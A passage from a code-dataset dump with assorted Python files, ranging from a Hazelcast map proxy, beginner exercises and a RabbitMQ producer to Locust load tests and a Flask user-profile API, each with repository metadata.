key, timeout=0):\n check_not_none(key, \"key can't be None\")\n\n key_data = self._to_data(key)\n\n return self._encode_invoke_on_key(map_try_remove_codec, key_data, key=key_data,\n thread_id=thread_id(), timeout=to_millis(timeout))\n\n def unlock(self, key):\n check_not_none(key, \"key can't be None\")\n\n key_data = self._to_data(key)\n\n return self._encode_invoke_on_key(map_unlock_codec, key_data, key=key_data,\n thread_id=thread_id())\n\n def values(self, predicate=None):\n if predicate:\n predicate_data = self._to_data(predicate)\n return self._encode_invoke(map_values_with_predicate_codec, predicate=predicate_data)\n else:\n return self._encode_invoke(map_values_codec)\n","sub_path":"hazelcast/proxy/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":16963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"324573051","text":"# Created by PyCharm Pro Edition \r\n# User: Kaushik Talukdar \r\n# Date: 01-04-17 \r\n# Time: 02:59 AM\r\n\r\n# we can use while to make the user determine when to quit the loop\r\n\r\ni=1\r\nflag = True\r\nwhile flag:\r\n print(1*i)\r\n i += 1\r\n opinion = input(\"Enter 0 to stop the process: \")\r\n if opinion == '0':\r\n flag = False\r\n else:\r\n flag = True\r\n\r\n# we have designed the program such that only upton inputting 0 will the program stop\r\n# even inputting 00 or 000 will have no affect on the program","sub_path":"6. User Input and While Loops/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"438163053","text":"#\n# ovirt-engine-setup -- ovirt engine setup\n# Copyright (C) 2013-2015 Red Hat, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\n\"\"\"Apache root plugin.\"\"\"\n\n\nimport gettext\n\nfrom otopi import constants as otopicons\nfrom otopi import filetransaction, plugin, util\n\nfrom ovirt_engine_setup import constants as osetupcons\nfrom ovirt_setup_lib import dialog\nfrom ovirt_engine_setup.engine_common import constants as oengcommcons\n\n\ndef _(m):\n return gettext.dgettext(message=m, domain='ovirt-engine-setup')\n\n\n@util.export\nclass Plugin(plugin.PluginBase):\n \"\"\"Apache root plugin.\"\"\"\n\n def __init__(self, context):\n super(Plugin, self).__init__(context=context)\n self._enabled = True\n\n @plugin.event(\n stage=plugin.Stages.STAGE_INIT,\n )\n def _init(self):\n self.environment.setdefault(\n oengcommcons.ApacheEnv.HTTPD_CONF_OVIRT_ROOT,\n oengcommcons.FileLocations.HTTPD_CONF_OVIRT_ROOT\n )\n self.environment.setdefault(\n oengcommcons.ApacheEnv.CONFIGURE_ROOT_REDIRECTION,\n None\n )\n self.environment.setdefault(\n oengcommcons.ApacheEnv.CONFIGURE_ROOT_REDIRECTIOND_DEFAULT,\n False\n )\n\n @plugin.event(\n stage=plugin.Stages.STAGE_SETUP,\n condition=lambda self: self._enabled,\n )\n def _setup(self):\n if (\n self.environment[\n oengcommcons.ApacheEnv.CONFIGURE_ROOT_REDIRECTION\n ] is None and\n (\n self.environment[\n osetupcons.CoreEnv.DEVELOPER_MODE\n ] or\n self.environment[\n oengcommcons.ApacheEnv.CONFIGURED\n ]\n )\n ):\n self._enabled = False\n\n @plugin.event(\n stage=plugin.Stages.STAGE_CUSTOMIZATION,\n before=(\n oengcommcons.Stages.DIALOG_TITLES_E_APACHE,\n ),\n after=(\n oengcommcons.Stages.DIALOG_TITLES_S_APACHE,\n ),\n condition=lambda self: (\n self.environment[oengcommcons.ApacheEnv.ENABLE] and\n self._enabled\n ),\n )\n def _customization(self):\n if self.environment[\n oengcommcons.ApacheEnv.CONFIGURE_ROOT_REDIRECTION\n ] is None:\n self.dialog.note(\n _(\n 'Setup can configure the default page of the '\n 'web server to present the application home page. '\n 'This may conflict with existing applications.'\n )\n )\n self.environment[\n oengcommcons.ApacheEnv.CONFIGURE_ROOT_REDIRECTION\n ] = dialog.queryBoolean(\n dialog=self.dialog,\n name='OVESETUP_APACHE_CONFIG_ROOT_REDIRECTION',\n note=_(\n 'Do you wish to set the application as the default page '\n 'of the web server? (@VALUES@) [@DEFAULT@]: '\n ),\n prompt=True,\n default=self.environment[\n oengcommcons.ApacheEnv.CONFIGURE_ROOT_REDIRECTIOND_DEFAULT\n ],\n )\n\n self._enabled = self.environment[\n oengcommcons.ApacheEnv.CONFIGURE_ROOT_REDIRECTION\n ]\n\n @plugin.event(\n stage=plugin.Stages.STAGE_MISC,\n condition=lambda self: (\n self.environment[oengcommcons.ApacheEnv.ENABLE] and\n self._enabled\n ),\n )\n def _misc(self):\n with open(\n oengcommcons.FileLocations.HTTPD_CONF_OVIRT_ROOT_TEMPLATE,\n 'r'\n ) as f:\n content = f.read()\n\n self.environment[oengcommcons.ApacheEnv.NEED_RESTART] = True\n self.environment[otopicons.CoreEnv.MAIN_TRANSACTION].append(\n filetransaction.FileTransaction(\n name=self.environment[\n oengcommcons.ApacheEnv.HTTPD_CONF_OVIRT_ROOT\n ],\n content=content,\n modifiedList=self.environment[\n otopicons.CoreEnv.MODIFIED_FILES\n ],\n )\n )\n\n\n# vim: expandtab tabstop=4 shiftwidth=4\n","sub_path":"packaging/setup/plugins/ovirt-engine-setup/ovirt-engine/apache/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":4701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"161405953","text":"# pylint: disable-all\n# flake8: noqa\n# type: ignore\n\"\"\"Summary.\"\"\"\n\nfrom typing import Any, List\n\nfrom falcon import Request, Response, abort\n\nfrom src.http_invoker import HttpInvoker\n\n\nclass FalconHttpInvoker(HttpInvoker):\n\n \"\"\"Summary\"\"\"\n\n def __init__(self, invocable: Any):\n \"\"\"Summary\n\n Args:\n invocable (Any): Description\n \"\"\"\n super().__init__(self, invocable)\n\n def on_get(self, request: Request, response: Response) -> None:\n \"\"\"Summary\n\n Args:\n request (Request): Description\n response (Response): Description\n \"\"\"\n data_out: List[Any] = []\n data_in: List[Any] = request.params\n # data_in(f'route: {str(request.url_rule)}')\n try:\n self._invocable.invoke(data_in, data_out)\n except Exception as err:\n print(str(err))\n abort(400)\n\n response.body = str(data_out)\n","sub_path":"src/falcon_http_invoker.py","file_name":"falcon_http_invoker.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"144660988","text":"import csv\r\n\r\nwith open('Height-Weight.csv',newline='')as f:\r\n reader=csv.reader(f)\r\n file_data=list(reader)\r\n\r\n#to pop the titles out of the list\r\nfile_data.pop(0)\r\n\r\n#sorting data to get the height of the ppl which is in first position\r\nnew_data=[]\r\n\r\nfor i in range(len(file_data)):\r\n n_num=file_data[i][1]\r\n new_data.append(float(n_num))\r\n\r\nn=len(new_data)\r\nnew_data.sort()\r\n\r\n#using floor division to get the nearest whole number\r\nif n%2==0:\r\n #getting the first number\r\n median1=float(new_data[n//2])\r\n #getting the second number\r\n median2=float(new_data[n//2-1])\r\n #getting the mean of those numbers\r\n median=median1+median2\r\nelse:\r\n median=new_data[n//2]\r\n\r\nprint(\"median is: \"+str(median))","sub_path":"median.py","file_name":"median.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"172368258","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on ‎Saturday, ‎November ‎3, ‎2018, ‏‎2:25:35 PM\n\n@author: RI\n\"\"\"\nfrom tkinter import N, S, W, E, Frame, Button\nfrom tkinter.ttk import Treeview, Scrollbar\n\n\nclass SalesLoftGUI(Frame):\n def __init__(self, master):\n Frame.__init__(self, master)\n master.title(\"SalesLoft People Data\")\n self.pack()\n \n self.frameButtons = Frame(self)\n self.frameButtons.pack()\n \n def addTable(self, data, columns, columnNames):\n #Set up the table\n frame = Frame(self)\n frame.pack() \n \n tv = Treeview(frame)\n tv.pack(side=\"left\") \n \n vsb = Scrollbar(frame, orient=\"vertical\", command=tv.yview)\n vsb.pack(side='right', fill='y')\n \n tv.configure(yscrollcommand=vsb.set)\n \n #Set up the first column\n tv.heading(\"#0\", text=columnNames[0])\n tv['columns'] = tuple(columns[1:])\n \n #Set up the remaining columns\n for col, colName in zip(columns[1:], columnNames[1:]):\n tv.heading(col, text=colName)\n \n #Add the data\n for d in data:\n row = []\n for c in columns[1:]: \n row.append(d[c])\n tv.insert('', 'end', text=d[columns[0]], values = tuple(row))\n \n\n def addButton(self, buttonText, onClick):\n b = Button(self.frameButtons, text=buttonText, command=onClick)\n b.pack(side=\"left\")\n","sub_path":"SalesLoftGui.py","file_name":"SalesLoftGui.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"460926549","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport decimal\nimport datetime\n\nimport extrathick\n\ndef dt_display (dt):\n return (dt - datetime.timedelta(hours=4)).strftime(\"%l:%M:%S%p\").lower()\n\ndef decimal_display (n):\n if n % decimal.Decimal(\"0.01\"):\n return str(n)\n else:\n return format(n, \".2f\")\n\ndef main (arg0, argv):\n cutoff = datetime.datetime(2018, 9, 25)\n min_price = None\n max_price = None\n with open(argv[0], mode=\"rt\") as fp:\n for line in fp:\n dt, price = line.split()\n dt = extrathick.dt_deserialize(dt)\n price = decimal.Decimal(price)\n if dt <= cutoff:\n continue\n #print(dt_display(dt), decimal_display(price))\n if min_price is None or price < min_price[\"price\"]:\n min_price = {\n \"price\": price,\n \"dt\": dt,\n }\n if max_price is None or price > max_price[\"price\"]:\n max_price = {\n \"price\": price,\n \"dt\": dt,\n }\n print(f\"{dt_display(min_price['dt'])}: {decimal_display(min_price['price'])}\")\n print(f\"{dt_display(max_price['dt'])}: {decimal_display(max_price['price'])}\")\n\nif __name__ == \"__main__\":\n try:\n c = main(sys.argv[0], sys.argv[1:])\n except KeyboardInterrupt:\n c = 1\n if c:\n sys.exit(c)\n","sub_path":"projects/apis/iex/other/minmax.py","file_name":"minmax.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"552443301","text":"import matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pylab as plt\nimport numpy as np\n\nspeaker_id = 10\nn_classes = 103\nname = 'softmax_cnn_knn_samples_dcgan_speech_model_clr0.0001_grl0.0001.ckpt-15000.npy'\nsoftmax = np.load(name)\n\npreds = softmax.argmax(axis=1)\nacc = np.sum(preds == speaker_id) / float(len(softmax))\n\n\nbins = set()\nbins = bins | set(preds)\nbins = np.array(sorted(list(bins)))\n\npred_counts = np.bincount(preds, minlength=n_classes)\n\nd = 0.2\nfig, ax = plt.subplots(1, 1, figsize=(6, 4))\nax.bar(np.arange(len(bins)), pred_counts[bins], align='center', alpha=0.7,\n label='Prediction acc. {0:.3f}'.format(acc))\nax.set_xticks(np.arange(len(bins)))\nax.set_xticklabels(bins)\nax.legend()\nfig.savefig('pred_histogram_{}.png'.format(name))\n\nfig, ax = plt.subplots(1, 1, figsize=(6, 4))\nax.imshow(softmax, aspect='auto', interpolation='nearest')\nfig.savefig('softmaxes_{}.png'.format(name))\n","sub_path":"asr_evaluate_single_speaker.py","file_name":"asr_evaluate_single_speaker.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"152020798","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n@file: producer.py\n@time: 2020/12/20 下午12:47\n@author: shenpinggang\n@contact: 1285456152@qq.com\n@desc: 生产者\n\"\"\"\nimport pika\n\nQUEUE = 'test_queue_demo'\n\n\ndef main():\n # 初始化连接参数。\n credential = pika.PlainCredentials(username='test', password='test')\n parameters = pika.ConnectionParameters(host='192.168.0.197',\n port=5672,\n virtual_host='/',\n credentials=credential)\n\n # 建立连接\n # 使用阻塞方法\n connection = pika.BlockingConnection(parameters=parameters)\n\n # 建立信道\n channel = connection.channel()\n\n # 声明消息队列\n # 建议消费者和生产者都进行声明\n # durable = False 是否队列进行持久化。\n channel.queue_declare(queue=QUEUE, durable=False)\n\n # 指定交换机并发送消息\n # exchange 交换机。队列模式下,没有交换机。所以为 ''\n # routing_key 为声明的消息队列名称\n # body 为发送的消息内容\n channel.basic_publish(exchange='',\n routing_key=QUEUE,\n body='Produce send message',\n properties=pika.BasicProperties(\n delivery_mode=2 # 设置消息为持久化模式。1 为非持久化\n ))\n\n # 关闭与 RabbitMQ 的连接\n connection.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"week05/test/queue_mod/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"135792637","text":"# -*- coding: utf-8 -*-\n\"\"\" EWS Observation tasks \"\"\"\nimport logging\nimport random\nfrom locust import task\nfrom locust_extension import LiveObsTaskSet\nfrom liveobs_ui.utils.converters import convert_list_of_data_dicts\nfrom liveobs_ui.page_object_models.mobile.data_entry_page import DataEntryPage\nfrom liveobs_test_fixtures.obs.ews import NO_RISK\nfrom liveobs_test_fixtures.obs.ews import LOW_RISK_SCORE_1\nfrom liveobs_test_fixtures.obs.ews import LOW_RISK_SCORE_2\nfrom liveobs_test_fixtures.obs.ews import LOW_RISK_SCORE_3\nfrom liveobs_test_fixtures.obs.ews import LOW_RISK_SCORE_4\nfrom liveobs_test_fixtures.obs.ews import MEDIUM_RISK_SCORE_5\nfrom liveobs_test_fixtures.obs.ews import MEDIUM_RISK_SCORE_6\nfrom tasks.mobile.escalation_task import EscalationTasks\n# from tasks.mobile.task_list import TaskList\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass EwsObs(LiveObsTaskSet):\n \"\"\" TaskSet for EWS Observations \"\"\"\n\n min_wait = 5000\n max_wait = 10000\n\n @task(9)\n class SubmitObs(LiveObsTaskSet):\n \"\"\" TaskSet for submitting EWS Observations \"\"\"\n def submit_obs(self, score):\n \"\"\" Submit observation with supplied score \"\"\"\n score_to_data_map = {\n 0: NO_RISK,\n 1: LOW_RISK_SCORE_1,\n 2: LOW_RISK_SCORE_2,\n 3: LOW_RISK_SCORE_3,\n 4: LOW_RISK_SCORE_4,\n 5: MEDIUM_RISK_SCORE_5,\n 6: MEDIUM_RISK_SCORE_6,\n }\n observation_form = DataEntryPage(self.client)\n form_data = convert_list_of_data_dicts(\n score_to_data_map.get(score))\n observation_form.fill_out_form(form_data)\n self.client.timed_event_for_locust(\n 'request',\n 'Submit Observation Form',\n observation_form.submit_form\n )\n self.client.timed_event_for_locust(\n 'request',\n 'Confirm Submit from Score Popup',\n observation_form.confirm_submit_scored_ob\n )\n # TODO this was an attempt to give a 60/40 chance to either click\n # on the escalation task in the modal or go back to the task list.\n # These should instead be represented by a separate TaskSet that\n # represents this decision point and sits in front of\n # EscalationTask.\n next_tasks = [EscalationTasks] * 4\n # next_tasks += [TaskList] * 6\n self.schedule_task(random.choice(next_tasks))\n\n @task(179)\n def score_0(self):\n \"\"\" Submit EWS Observation with Early Warning Score of 0 \"\"\"\n self.submit_obs(0)\n\n @task(175)\n def score_1(self):\n \"\"\" Submit EWS Observation with Early Warning Score of 1 \"\"\"\n self.submit_obs(1)\n\n @task(76)\n def score_2(self):\n \"\"\" Submit EWS Observation with Early Warning Score of 2 \"\"\"\n self.submit_obs(2)\n\n @task(29)\n def score_3(self):\n \"\"\" Submit EWS Observation with Early Warning Score of 3 \"\"\"\n self.submit_obs(3)\n\n @task(6)\n def score_4(self):\n \"\"\" Submit EWS Observation with Early Warning Score of 4 \"\"\"\n self.submit_obs(4)\n\n @task(2)\n def score_5(self):\n \"\"\" Submit EWS Observation with Early Warning Score of 5 \"\"\"\n self.submit_obs(5)\n\n @task(1)\n def score_6(self):\n \"\"\" Submit EWS Observation with Early Warning Score of 6 \"\"\"\n self.submit_obs(6)\n\n @task(1)\n def stop(self):\n \"\"\"\n Escape the EWS form and go up to the level above in Locust\n heirarchy\n \"\"\"\n self.client.timed_event_for_locust(\n 'request',\n 'Abandoning Observation',\n self.client.get,\n '{}/mobile/patients'.format(self.locust.host)\n )\n self.escape('MobileHome')\n","sub_path":"tasks/mobile/ews_obs.py","file_name":"ews_obs.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"301121307","text":"# coding: utf-8\n__author__ = 'Harald Floor Wilhelmsen'\n\nimport confighandler as ch\nimport serial\n\nser = serial.Serial('/dev/ttyACM0', 9600)\n\ndiscoActive = True\nmaxDiscoTime = 3000\nstandardDiscoTime = 20\n\n\ndef parsediscowish(ircmsg, sender):\n if sender not in ch.groups[\"drift\"].members: # if sender is not in group \"drift\" do nothing\n return ''\n global discoActive\n if ircmsg.find('.discodeactivate') != -1:\n discoActive = False\n return 'Discotime deactivated'\n elif ircmsg.find('.discoreactivate') != -1:\n discoActive = True\n return 'Discotime reactivated'\n try:\n if discoActive and ircmsg.find('.discotime') != -1:\n try:\n discoTime = int(\n ircmsg[ircmsg.find('(') + 1: ircmsg.find(')')])\n except ValueError:\n discoTime = standardDiscoTime\n if discoTime > maxDiscoTime:\n discoTime = maxDiscoTime\n print('Discotime for ' + str(discoTime) + '!')\n ser.write(str.encode(str(discoTime)))\n print(ser.read())\n else:\n ser.write(b'0')\n except serial.serialutil.SerialException:\n print('Device unplugged or wrong device used')\n return ''\n","sub_path":"scripts/discohandler.py","file_name":"discohandler.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"308349251","text":"#!/bin/python3\n\nimport os\nimport sys\nimport numpy as np \nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef computeCost(X, y, theta):\n '''\n en: Computes the cost of using theta as the parameter for linear\n regression to fit data points in X and y\n pt-br: Calcula a função de custo usando theta como parametro para\n regressão linear para ajustar os pontos em X e y\n '''\n h = X * theta.T\n err = h - y\n return np.sum(np.power(err, 2)) / (2 * len(X))\n\ndef gradientDescent(X, y, theta, alpha, num_iters):\n '''\n en: Performs gradient descent to learn theta updates theta by\n taking num_iters gradient steps with learning rate alpha\n pt-br: Executa o algoritmo gradient descente atualizando theta\n utilizando num_iters passos com a taxa de aprendizado alpha\n '''\n temp = np.matrix(np.zeros(theta.shape))\n parameters = int(theta.ravel().shape[1])\n cost = np.zeros(num_iters)\n for i in range(num_iters):\n h = X * theta.T\n err_vec = h - y\n for j in range(parameters):\n theta_change = np.multiply(err_vec, X[:,j])\n theta[0, j] -= np.sum(theta_change) * (alpha / len(X))\n \n theta = temp\n cost[i] = computeCost(X, y, theta)\n\n return (theta, cost)\n\nif __name__ == \"__main__\":\n\n path = os.getcwd() + '/ex1data1.txt'\n data = pd.read_csv(path, header=None, names=['Population', 'Profit'])\n print(data.head())\n print(data.describe())\n data.plot(kind='scatter', x='Population', y='Profit', figsize=(12,8))\n plt.show()\n\n # append a ones column to the front of the dat set\n data.insert(0, 'ones', 1)\n\n # set X (training data) and y (target variable)\n cols = data.shape[1]\n X = data.iloc[:,0:cols-1]\n y = data.iloc[:,cols-1:cols]\n\n # convert from data frames to numpy matrices\n X = np.matrix(X.values)\n y = np.matrix(y.values)\n theta = np.matrix(np.array([0,0]))\n\n print(computeCost(X, y, theta))\n\n # initiliaze variables for learning rate and iterations\n alpha = 0.01\n iters = 1000\n\n # print(gradientDescent(X, y, theta, alpha, iters))","sub_path":"machine-learning-ex1/SimpleLinearRegression.py","file_name":"SimpleLinearRegression.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"242304525","text":"import sys\nfrom csv import DictWriter\nfrom datetime import date\n\nfrom anki_sentence_maker.maker import Maker\nfrom logger import logger\nfrom type.data import Data\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n\ndef generate_csv(filename: str, sentences_list: list[Data]) -> None:\n \"\"\"Generate a csv file with list of sentences\"\"\"\n with open(filename, \"w\", encoding=\"utf-8-sig\", newline=\"\") as file:\n fieldnames: list[str] = [\"sentence\", \"information\"]\n writer: DictWriter = DictWriter(file, fieldnames=fieldnames)\n\n for sentence in sentences_list:\n for example in sentence.examples:\n writer.writerow(\n {\n \"sentence\": example,\n \"information\": f\"{sentence.name} {sentence.phonetic_notation}\\n({', '.join(sentence.definitions)})\",\n }\n )\n\n\ndef get_sentences_from_args(\n words: list[str],\n) -> list[Data]:\n \"\"\"Get sentences with the words provided\"\"\"\n sentences_list = []\n\n for word in words:\n maker = Maker(word=word)\n sentences_list.append(maker.sentence)\n sentences_list = [s for s in sentences_list if s]\n\n return sentences_list\n\n\ndef main() -> None:\n words: list[str] = sys.argv[1:]\n sentences: list[Data] = get_sentences_from_args(words=words)\n\n if not sentences:\n logger.warning(\"We haven't got any sentences\")\n else:\n brazil_date_notation: str = date.today().strftime(\"%d-%m-%y\")\n filename: str = f\"sentences-{brazil_date_notation}.csv\"\n generate_csv(filename, sentences)\n logger.info(f\"{filename} file has been generated\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"433799419","text":"\"\"\"\n 读取excel\n\"\"\"\nimport xlrd\n\ndef read_excel(excel_path, sheet_name, skip_first=True):\n \"\"\"\n 方法名:读取excel\n 参数:\n excel_path:excel的路径\n sheet_name:table页面的名字\n skip_first:是否跳过首行,默认为是\n 返回值:[[1,2,3,4,], [1,2,3,4]]\n \"\"\"\n results = []\n datas = xlrd.open_workbook(excel_path)\n table = datas.sheet_by_name(sheet_name)\n if skip_first == True:\n start_row = 1\n else:\n start_row = 0\n \n # 循环读取每一行的数据 (1,2)\n for row in range(start_row, table.nrows): # (1,2)\n results.append(table.row_values(row))\n\n return results\n\nif __name__ == \"__main__\":\n data = read_excel('D:\\\\Awork\\\\ljtest202011\\\\PythonProject\\\\PYTESTTEST\\\\data\\\\datas.xlsx', \"登录\")\n print(data)\n\n","sub_path":"PythonProject/PYTESTTEST/utils/exceltools.py","file_name":"exceltools.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"641271412","text":"import torch \nimport pickle as pkl\nimport numpy as np\n\ndef tensor2numpy(filepath:str, savefolder=\"./data/ml_100k/\"):\n rating2=torch.load(filepath)\n arr=rating2.permute(1,2,0).cpu().numpy()\n u,v,R=arr.shape\n output=np.zeros(shape=(u,v))\n for i in range(u):\n for j in range(v):\n for r in range(R):\n if arr[i, j, r]==1:\n output[i,j]=r+1\n try:\n with open(savefolder+\"test_rating_numpy.pkl\", \"wb\") as f:\n pkl.dump(output, f)\n except:\n print(\"Dump error\")\n return ","sub_path":"finaltool.py","file_name":"finaltool.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"40906043","text":"# !/usr/bin/env python\n# coding:utf-8\n\n# @Time : 18-4-19 下午5:53\n# @Author : LiGang\n# @File : profile.py\n# @Software: PyCharm\n\n# 展示首页的用户名,个人信息页面, 上传图片, 修改用户名,查询实名认证信息,保存实名认证信息,查询我的房源\n\nfrom flask import current_app, jsonify\nfrom flask import g\nfrom flask import request\nfrom flask import session\n\nfrom ihome import constants\nfrom ihome import db\nfrom ihome.utils.commons import login_required\nfrom ihome.models import User\nfrom ihome.utils.commons import login_required, login_required, login_required\nfrom ihome.utils.image_storage import image_storage\nfrom ihome.utils.response_code import RET\nfrom ihome.api_1_0 import api\n\n\n# 功能描述: 显示首页的用户名(未使用)\n# 请求路径: /api/v1.0/session\n# 请求方式: GET\n# 请求参数: 无\n@api.route(\"/session\")\n@login_required\ndef get_user_name():\n\t\"\"\"\n\t1.获取到用户编号\n\t2.到数据库中查询用户的对象信息\n\t3.将用户对象内容,响应到前端页面中\n\t:return:\n\t\"\"\"\n\t# 1.获取到用户编号\n\tuser_id = g.user_id\n\n\t# 2.到数据库中查询用户的对象信息\n\ttry:\n\t\tuser = User.query.get(user_id)\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\treturn jsonify(errno=RET.DBERR, errmsg=\"数据库查询异常\")\n\n\tif not user:\n\t\treturn jsonify(errno=RET.DATAERR, errmsg=\"该用户不存在\")\n\n\t# 3.将用户对象内容,响应到前端页面中\n\treturn jsonify(errno=RET.OK, errmsg=\"获取成功\", data={\"user_id\": user_id, \"name\": user.name})\n\n\n# 功能描述: 展示个人信息\n# 请求路径: /api/v1.0/user\n# 请求方式: GET\n# 请求参数: 无\n@api.route('/user')\n@login_required\ndef get_user_profile():\n\t\"\"\"\n\t# 1.获取到session中的手机号\n\t# 2.根据手机号查询用户的个人信息\n\t# 3.判断个人信息是否存在\n\t# 4.将个人信息转成字典格式\n\t# 5.将字典信息返回到前端页面展示\n\t\"\"\"\n\t# 1.获取到session中的手机号\n\t# mobile = session.get(\"mobile\")\n\tuser_id = g.user_id\n\n\tif not user_id:\n\t\treturn jsonify(errno=RET.DATAERR, errmsg=\"用户状态信息过期\")\n\n\t# 2.根据手机号查询用户的个人信息\n\ttry:\n\t\tuser = User.query.filter(User.id == user_id).first()\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\treturn jsonify(errno=RET.DBERR, errmsg=\"数据库查询异常\")\n\n\t# 3.判断个人信息是否存在\n\tif not user:\n\t\treturn jsonify(errno=RET.DATAERR, errmsg=\"该用户不存在\")\n\n\t# 3.判断个人信息是否存在\n\tif not user:\n\t\treturn jsonify(errno=RET.DATAERR,errmsg=\"用户信息已过期\")\n\n\t# 4.将个人信息转成字典格式\n\t\t# 在模型类中定义方法实现\n\n\t# 5.将字典信息返回到前端页面展示\n\treturn jsonify(errno=RET.OK,errmsg=\"获取成功\",data=user.user_to_dict())\n\n\n#功能描述: 上传头像\n#请求路径: /api/v1.0/user/avatar\n#请求方式: POST\n#请求参数: 头像\n@api.route(\"/user/avatar\",methods=[\"POST\"])\n@login_required\ndef image_upload():\n\t\"\"\"\n\t1.获取参数,头像, 用户编号\n\t2.校验参数\n\t3.调用工具类上传头像\n\t4.通过用户编号获取到用户对象\n\t5.将图片名称更新到用户对象\n\t6.提交用户对象到数据库中\n\t7.返回状态信息到前端页面\n\t:return:\n\t\"\"\"\n\t# 1.获取参数,头像, 用户编号\n\tuser_id = g.user_id\n\timage_data = request.files.get(\"avatar\").read() # 获取文件使用的是request.files方式\n\n\t# 2.校验参数\n\tif not all([user_id, image_data]):\n\t\treturn jsonify(errno=RET.PARAMERR, errmsg=\"参数不完整\")\n\n\t# 3.调用工具类上传头像\n\ttry:\n\t\timage_name = image_storage(image_data)\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\treturn jsonify(errno=RET.THIRDERR, errmsg=\"七牛云上传失败\")\n\n\t# 4.通过用户编号获取到用户对象\n\ttry:\n\t\tuser = User.query.get(user_id)\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\treturn jsonify(errno=RET.DBERR, errmsg=\"数据库查询异常\")\n\n\t# 5.将图片名称更新到用户对象\n\tuser.avatar_url = image_name\n\n\t# 6.提交用户对象到数据库中\n\ttry:\n\t\tdb.session.commit()\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\tdb.session.rollback()\n\t\treturn jsonify(errno=RET.DBERR, errmsg=\"用户头像保存异常\")\n\n\t# 7.返回状态信息到前端页面\n\tavatar_url = constants.QINIU_DOMIN_PREFIX + user.avatar_url\n\treturn jsonify(errno=RET.OK, errmsg=\"头像上传成功\", data={\"avatar_url\": avatar_url})\n\n\n# 功能描述: 修改用户名\n# 请求路径: /api/v1.0/user/name\n# 请求方式: POST/PUT都可以\n# 请求参数: 无\n@api.route(\"/user/name\",methods=[\"PUT\"])\n@login_required\ndef set_user_name():\n\t\"\"\"\n\t1.获取用户编号,用户名\n\t2.通过用户编号在数据库中查询用户对象\n\t3.判断用户是否存在\n\t4.将用户对象的信息用户名,进行更新\n\t5.保存到数据库\n\t6.返回\n\t:return:\n\t\"\"\"\n\t# 1.获取用户编号,用户名\n\tuser_id = g.user_id\n\tusername = request.json.get(\"name\")\n\n\t# 2.通过用户编号在数据库中查询用户对象\n\ttry:\n\t\tuser = User.query.filter(User.id == user_id).first()\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\treturn jsonify(errno=RET.DBERR, errmsg=\"数据库查询异常\")\n\n\t# 3.判断用户是否存在\n\tif not user:\n\t\treturn jsonify(errno=RET.DATAERR, errmsg=\"该用户不存在\")\n\n\t# 4.将用户对象的信息用户名,进行更新\n\tuser.name = username\n\n\t# 5.保存到数据库\n\ttry:\n\t\tdb.session.commit()\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\treturn jsonify(errno=RET.DBERR, errmsg=\"数据更新异常\")\n\n\t# 6.返回\n\treturn jsonify(errno=RET.OK, errmsg=\"保存用户名成功\")\n\n\n# 功能描述:查询实名认证信息\n# 请求路径:/user/auth\n# 请求方式:get\n# 